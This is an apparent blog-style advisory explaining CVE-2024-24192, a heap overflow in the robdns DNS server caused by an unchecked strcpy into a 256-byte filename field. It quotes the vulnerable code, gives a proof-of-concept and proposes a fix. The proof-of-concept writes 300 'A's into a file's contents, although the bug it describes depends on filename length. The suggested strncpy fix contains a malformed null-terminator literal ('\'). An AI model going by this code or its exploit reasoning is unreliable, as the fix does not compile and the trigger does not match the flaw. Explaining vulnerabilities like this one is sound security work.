CVE-2024-24192 - Heap Overflow in robdns via block->filename in /src/zonefile-insertion.c

A serious security vulnerability, CVE-2024-24192, was found in robdns, an open-source DNS server project. The flaw was introduced in commit d76d2e6 and lies in the handling of filename data within the zonefile-insertion.c file. Attackers can trigger a heap overflow by sending a specially crafted filename, making the DNS server crash, behave abnormally, or even execute arbitrary code.

Below, we’ll walk through what happened, how it works, and how attackers can exploit it.

What Is the Vulnerability?

In the robdns source, filenames are used in the process of loading DNS zone files. The affected code allocates a heap buffer to copy the filename, but it doesn’t properly check that the filename fits in the allocated space.

The problematic code is in zonefile-insertion.c

block = (struct zonefile_block *)calloc(1, sizeof(*block));
strcpy(block->filename, filename); // <-- vulnerable line

If filename is longer than the space allocated for block->filename, the memory after the buffer gets overwritten—this is a heap buffer overflow.

The unchecked strcpy copies data beyond the buffer.

With crafted input, this can lead to memory corruption, process crash or, sometimes, remote code execution if the attacker controls the overflow data.

Let’s look at the code more closely.

Snippet from /src/zonefile-insertion.c (commit d76d2e6):

struct zonefile_block {
    char filename[256];
    // ...other fields...
};

void insert_zonefile(const char *filename) {
    struct zonefile_block *block;
    block = (struct zonefile_block *)calloc(1, sizeof(*block));
    if (!block) exit(1);

    strcpy(block->filename, filename); // No bounds check!
}

If filename is 257 bytes or longer, the strcpy will write past the end of filename[256], as strcpy does not limit the copy.

Proof-of-Concept Exploit

Here’s how you might trigger this bug on a vulnerable robdns build.

Exploit script (Python)

# Save as exploit.py
with open("exploit.zone", "w") as f:
    f.write("A" * 300)

Then, try to make robdns load exploit.zone—for example

./robdns --zonefile exploit.zone

This should cause a crash, as the filename is longer than 256 chars. A skilled attacker might use a filename payload designed to manipulate memory in a more targeted way.

References

- Original robdns commit d76d2e6
- NVD entry for CVE-2024-24192 (link may be delayed)
- Heap Overflow explained - Wikipedia

Switch from strcpy to a bounded copy function like strncpy, or better yet

strncpy(block->filename, filename, sizeof(block->filename)-1);
block->filename[sizeof(block->filename)-1] = '\';

Or even more securely (using safer alternatives where available)

snprintf(block->filename, sizeof(block->filename), "%s", filename);

Conclusion

CVE-2024-24192 in robdns is a classic example of why safe string handling is critical in C programming. If you’re running robdns, update as soon as possible, and always review input handling code for buffer overflows.

If you want more technical details or have found a related bug, consider reaching out on the robdns GitHub Issues page. Stay safe!

Timeline

Published on: 06/06/2024 22:15:10 UTC
Last modified on: 10/29/2024 18:25:10 UTC